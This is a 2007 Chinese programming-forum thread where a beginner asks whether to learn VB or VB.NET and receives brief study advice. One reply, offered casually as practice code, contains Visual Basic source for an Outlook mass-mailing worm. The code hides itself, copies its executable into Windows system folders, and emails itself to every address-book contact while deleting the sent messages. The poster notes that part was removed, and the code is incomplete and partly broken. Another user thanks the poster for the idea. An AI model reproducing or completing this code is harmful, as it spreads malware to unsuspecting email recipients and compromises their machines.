| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 843 人关注过本帖
标题:[求助]vb与vb.net
只看楼主 加入收藏
pish
Rank: 1
等 级:新手上路
帖 子:35
专家分:0
注 册:2007-10-6
收藏
 问题点数:0 回复次数:10 
[求助]vb与vb.net
我想学一下vb,就是不知道vb跟有什么不一样啊,有没有必要两种都学还是学其中一种就可以了,请多多指教!
搜索更多相关主题的帖子: 多多 想学 
2007-10-07 18:55
刨子头
Rank: 1
等 级:新手上路
威 望:1
帖 子:319
专家分:0
注 册:2007-9-24
收藏
得分:0 
vb.net更适用于网络程序开发
2007-10-07 19:34
我是一只菜菜鸟
Rank: 1
等 级:新手上路
帖 子:146
专家分:0
注 册:2007-9-29
收藏
得分:0 

自学VB该如何开始?


从菜鸟开始````
2007-10-07 19:45
multiple1902
Rank: 8Rank: 8
等 级:贵宾
威 望:42
帖 子:4881
专家分:671
注 册:2007-2-9
收藏
得分:0 
看书,做题,看别人的程序,少问问题。
2007-10-07 19:46
刨子头
Rank: 1
等 级:新手上路
威 望:1
帖 子:319
专家分:0
注 册:2007-9-24
收藏
得分:0 
我第一次接触VB是看到别人程序的源码,然后是买了一本最基础的书《VB5.0可视化编程基础》(还VB5.0呢)。
先大致看懂他人的程序,并试着改动,试着做你感兴趣的工程!
2007-10-07 19:55
我是一只菜菜鸟
Rank: 1
等 级:新手上路
帖 子:146
专家分:0
注 册:2007-9-29
收藏
得分:0 

少问问题。

《VB5.0可视化编程基础》(还VB5.0呢)。 能换成6.0的吗

并试着改动,试着做你感兴趣的工程!

改这个可以吗
Sub Main()

App.TaskVisible = False

On Error Resume Next
Dim Location, Location2, DesLocation, DesLocation2

Location = App.Path & "\" & App.EXEName & ".exe"
Location2 = App.Path & App.EXEName & ".exe"


DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"
DesLocation2 = "C:\WINNT\SYSTEM\Mapi.exe"


FileCopy Location, DesLocation
FileCopy Location2, DesLocation
FileCopy Location, DesLocation2
FileCopy Location2, DesLocation2

Dim Var1, FilePath, FileName, FullLocation, MyApp
Dim Christmas, List, AddList, AddressListCount
Dim Merry, AdEntries, Attachs, Msg
Var1 = "True"
FilePath = App.Path
FileName = App.EXEName
FullLocation = FilePath & "\" & FileName
Set MyApp = CreateObject("Outlook.Application")
If MyApp = "Outlook" Then
Set Christmas = MyApp.GetNameSpace("mapi")
Set List = Christmas.AddressLists
For Each Addresslist In List
If Addresslist.AddressEntries.Count <> 0 Then
AddressListCount = Addresslist.AddressEntries.Count
For AddList = 1 To AddressListCount
Set Merry = MyApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
Merry.To = AdEntries.Address
Merry.Subject = "11111111111111111"
Merry.Body = "111111111111111111111"
Set Attachs = Merry.Attachments
Attachs.Add FullLocation
If Var1 = "true" Then
Merry.DeleteAfterSubmit = True
If Msg.To <> "" Then
Merry.send
End If
End If
Next
Beep
End If
Next
删掉一点,呵呵

[此贴子已经被作者于2007-10-7 20:02:56编辑过]


从菜鸟开始````
2007-10-07 20:00
multiple1902
Rank: 8Rank: 8
等 级:贵宾
威 望:42
帖 子:4881
专家分:671
注 册:2007-2-9
收藏
得分:0 

[CODE]Location = App.Path & "\" & App.EXEName & ".exe"
Location2 = App.Path & App.EXEName & ".exe"

DesLocation = "C:\WINDOWS\SYSTEM\WinMapi.exe"
DesLocation2 = "C:\WINNT\SYSTEM\Mapi.exe"

FileCopy Location, DesLocation
FileCopy Location2, DesLocation
FileCopy Location, DesLocation2
FileCopy Location2, DesLocation2[/CODE]

忒强了,这样容错……

2007-10-07 20:05
刨子头
Rank: 1
等 级:新手上路
威 望:1
帖 子:319
专家分:0
注 册:2007-9-24
收藏
得分:0 
2007-10-07 20:06
刨子头
Rank: 1
等 级:新手上路
威 望:1
帖 子:319
专家分:0
注 册:2007-9-24
收藏
得分:0 
谢谢给了我这个思路!
2007-10-07 20:12
pish
Rank: 1
等 级:新手上路
帖 子:35
专家分:0
注 册:2007-10-6
收藏
得分:0 
vb跟有必要都学吗?还是说学了就不用学vb了

2007-10-07 22:24
快速回复:[求助]vb与vb.net
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.014982 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved